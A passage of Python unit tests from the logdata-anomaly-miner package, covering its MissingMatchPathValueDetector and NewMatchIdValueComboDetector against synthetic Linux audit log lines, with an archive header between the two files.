time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s2', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match3", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d2', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match4", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) missing_match_path_list_value_detector.do_persist() past_time = 4000 other_missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(other_missing_match_path_list_value_detector, description + "2") other_missing_match_path_list_value_detector.last_seen_timestamp = t + past_time other_missing_match_path_list_value_detector.set_check_value(other_missing_match_path_list_value_detector.get_channel_key( log_atom_fixed_dme)[1], self.__default_interval - past_time, match_element_fixed_dme.get_path()) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, other_missing_match_path_list_value_detector) self.assertTrue(other_missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) # skipcq: PYL-R1714 self.assertTrue((self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time).strftime(self.datetime_format_string), other_missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match3/s2, match4/d2: ' pid=' overdue 400s (interval -400)")) or (self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time + 1).strftime(self.datetime_format_string), other_missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match3/s2, match4/d2: ' pid=' overdue 400s (interval -400)"))) def test11multiple_paths(self): """Test the functionality of the MissingMatchPathValueDetector with multiple paths.""" description = "Test11MissingMatchPathValueDetector" match_context = MatchContext(self.pid + b"22") fixed_dme = FixedDataModelElement('s1', self.pid) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) seq = SequenceModelElement('model', [fixed_dme, decimal_integer_value_me]) match_element = seq.get_match_element("match", match_context) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [ "match/model", "match/model/s1", "match/model/d1"], [self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom = LogAtom(fixed_dme.fixed_data + b"22", ParserMatch(match_element), 1, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom)) def test12multiple_paths_data_from_file(self): """Test the functionality of the MissingMatchPathValueDetector with multiple paths with more data.""" description = "Test12MissingMatchPathValueDetector" with open('unit/data/multiple_pathes_mmpvd.txt', 'rb') as f: data = f.readlines() host1 = FixedDataModelElement("host1", b"host1 ") host2 = FixedDataModelElement("host2", b"host2 ") service1 = FixedDataModelElement("service1", b"service1") service2 = FixedDataModelElement("service2", b"service2") seq11 = SequenceModelElement("seq11", [host1, service1]) seq12 = SequenceModelElement("seq12", [host1, service2]) seq21 = SequenceModelElement("seq21", [host2, service1]) seq22 = SequenceModelElement("seq22", [host2, service2]) first = FirstMatchModelElement("first", [seq11, seq12, seq21, seq22]) missing_match_path_value_detector11 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq11", "match/first/seq11/host1", "match/first/seq11/service1"], [self.stream_printer_event_handler], 'Default11', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector11, description+"11") missing_match_path_value_detector12 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq12", "match/first/seq12/host1", "match/first/seq12/service2"], [self.stream_printer_event_handler], 'Default23', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector12, description+"12") missing_match_path_value_detector21 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq21", "match/first/seq21/host2", "match/first/seq21/service1"], [self.stream_printer_event_handler], 'Default21', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector21, description+"21") missing_match_path_value_detector22 = MissingMatchPathValueDetector(self.aminer_config, [ "match/first/seq22", "match/first/seq22/host2", "match/first/seq22/service2"], [self.stream_printer_event_handler], 'Default22', True, 480, 480) self.analysis_context.register_component(missing_match_path_value_detector22, description+"22") t = 0 for line in data: split_line = line.rsplit(b" ", 2) date = datetime.strptime(split_line[0].decode(), "%Y-%m-%d %H:%M:%S") date = date.astimezone(timezone.utc) t = (date - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() # initialize the detectors and remove the first output. if missing_match_path_value_detector11.learn_mode is True: line = b"host1 service1host1 service2host2 service1host2 service2" match_context = MatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector11) missing_match_path_value_detector11.receive_atom(log_atom) missing_match_path_value_detector11.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) missing_match_path_value_detector12.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) missing_match_path_value_detector21.learn_mode = False match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) missing_match_path_value_detector22.learn_mode = False self.reset_output_stream() line = split_line[1] + b" " + split_line[2] match_context = MatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector11) res = missing_match_path_value_detector11.receive_atom(log_atom) if match_element.get_path() == "match/first/seq11": self.assertTrue(res) res = missing_match_path_value_detector12.receive_atom(log_atom) if match_element.get_path() == "match/first/seq12": self.assertTrue(res) res = missing_match_path_value_detector21.receive_atom(log_atom) if match_element.get_path() == "match/first/seq21": self.assertTrue(res) res = missing_match_path_value_detector22.receive_atom(log_atom) if match_element.get_path() == "match/first/seq22": self.assertTrue(res) # need to produce a valid match to trigger missing match paths. line = b"host1 service1host1 service2host2 service1host2 service2" match_context = MatchContext(line) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector11) missing_match_path_value_detector11.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector12) missing_match_path_value_detector12.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector21) missing_match_path_value_detector21.receive_atom(log_atom) match_element = first.get_match_element("match", match_context) log_atom = LogAtom(line, ParserMatch(match_element), t, missing_match_path_value_detector22) missing_match_path_value_detector22.receive_atom(log_atom) # exactly one overdue should be found msg = "2021-03-12 21:30:51 Interval too large between values\nMissingMatchPathValueDetector: \"Test12MissingMatchPathValue" \ "Detector11\" (1 lines)\n ['match/first/seq11', 'match/first/seq11/host1', 'match/first/seq11/service1']: \"['host1 " \ "service1', 'host1 ', 'service1']\" overdue 12s (interval 480)\n\n" self.assertEqual(msg, self.output_stream.getvalue()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchIdValueComboDetectorTest.py000066400000000000000000000607461437606560100324700ustar00rootroot00000000000000import time from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class NewMatchIdValueComboDetectorTest(TestBase): """Unittests for the NewMatchIdValueComboDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1' b' ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)'] expected_allowlist_string = "Allowlisted path(es) parser/type/path/name, parser/type/syscall/syscall with %s." parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement( 'mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) def test1receive_match_in_time_with_learn_mode(self): """This test case checks if log_atoms are accepted as expected with the learn_mode=True.""" description = 'test1newMatchIdValueComboDetectorTest' output_stream_empty_results = [True, False, True, False, True, False, True, True, True, True, True, True, True, True, False, False, False, True, False, True, False] id_dict_current_results = [ {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {}, {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 5: {'parser/type/path/name': 'two'}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}}, {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}}, {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 9: {'parser/type/syscall/syscall': 2}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 10: {'parser/type/path/name': 'one'}}, {100: {'parser/type/syscall/syscall': 1}}] id_dict_old_results = [{}] * 21 min_allowed_time_diff = 0.1 log_atoms = [] for line in self.log_lines: t = time.time() log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=True, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) for i, log_atom in enumerate(log_atoms): self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i]) self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i]) self.reset_output_stream() def test2receive_match_after_max_allowed_time_diff_with_learn_mode(self): """This test case checks if log_atoms are deleted after the maximal allowed time difference with the learn_mode=True.""" description = 'test2newMatchIdValueComboDetectorTest' output_stream_empty_results = [True, False, True, False, True, False, True, True, True, True, True, True, True, True, False, False, False, True, False, True, False] id_dict_current_results = [ {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {}, {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}}, {5: {'parser/type/path/name': 'two'}, 100: {'parser/type/syscall/syscall': 1}}, {}, {6: {'parser/type/syscall/syscall': 4}}, {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}}, {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {}, {}, {9: {'parser/type/syscall/syscall': 2}}, {}, {10: {'parser/type/path/name': 'one'}}, {}] id_dict_old_results = [{}] * 10 + [{100: {'parser/type/syscall/syscall': 1}}] * 5 + [{8: {'parser/type/syscall/syscall': 6}}] + [ {}] * 5 min_allowed_time_diff = 5 log_atoms = [] t = time.time() for line in self.log_lines: log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) t = t + min_allowed_time_diff * 0.25 new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=True, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) for i, log_atom in enumerate(log_atoms): self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i]) self.reset_output_stream() def test3receive_match_in_time_without_learn_mode(self): """This test case checks if log_atoms are accepted as expected with the learn_mode=False.""" description = 'test3newMatchIdValueComboDetectorTest' output_stream_empty_results = [True, False, True, False, True, False, True, True, False, True, False, True, True, True, False, False, False, True, False, True, False] id_dict_current_results = [ {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {}, {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 5: {'parser/type/path/name': 'two'}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}}, {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}}, {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 9: {'parser/type/syscall/syscall': 2}}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 10: {'parser/type/path/name': 'one'}}, {100: {'parser/type/syscall/syscall': 1}}] id_dict_old_results = [{}] * 21 min_allowed_time_diff = 0.1 log_atoms = [] for line in self.log_lines: t = time.time() log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) for i, log_atom in enumerate(log_atoms): self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i]) self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i]) self.assertEqual(new_match_id_value_combo_detector.known_values, []) self.reset_output_stream() def test4receive_match_after_max_allowed_time_diff_without_learn_mode(self): """This test case checks if log_atoms are deleted after the maximal allowed time difference with the learn_mode=False.""" description = 'test4newMatchIdValueComboDetectorTest' output_stream_empty_results = [True, False, True, False, True, False, True, True, False, True, False, True, True, True, False, False, False, True, False, True, False] id_dict_current_results = [ {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {}, {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}}, {5: {'parser/type/path/name': 'two'}, 100: {'parser/type/syscall/syscall': 1}}, {}, {6: {'parser/type/syscall/syscall': 4}}, {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}}, {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {}, {}, {9: {'parser/type/syscall/syscall': 2}}, {}, {10: {'parser/type/path/name': 'one'}}, {}] id_dict_old_results = [{}] * 10 + [{100: {'parser/type/syscall/syscall': 1}}] * 5 + [{8: {'parser/type/syscall/syscall': 6}}] + [ {}] * 5 min_allowed_time_diff = 5 log_atoms = [] t = time.time() for line in self.log_lines: log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) t = t + min_allowed_time_diff * 0.25 new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) for i, log_atom in enumerate(log_atoms): self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i]) self.assertEqual(new_match_id_value_combo_detector.known_values, []) self.reset_output_stream() def test5allowlist_unknown_target_path(self): """This test case checks if an unknown target path can be added to the known_values with the allowlist_event method.""" description = 'test5newMatchIdValueComboDetectorTest' min_allowed_time_diff = 5 new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) self.assertEqual(new_match_id_value_combo_detector.known_values, []) event_data = {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [ {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) event_data = {'parser/type/syscall/syscall': 2, 'parser/type/path/name': 'two'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [ {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}, {'parser/type/syscall/syscall': 2, 'parser/type/path/name': 'two'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) def test6allowlist_known_target_path(self): """This test case checks if a known target path is not added twice to the known_values with the allowlist_event method.""" description = 'test6newMatchIdValueComboDetectorTest' min_allowed_time_diff = 5 new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) self.assertEqual(new_match_id_value_combo_detector.known_values, []) event_data = {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [{'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) event_data = {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [{'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) 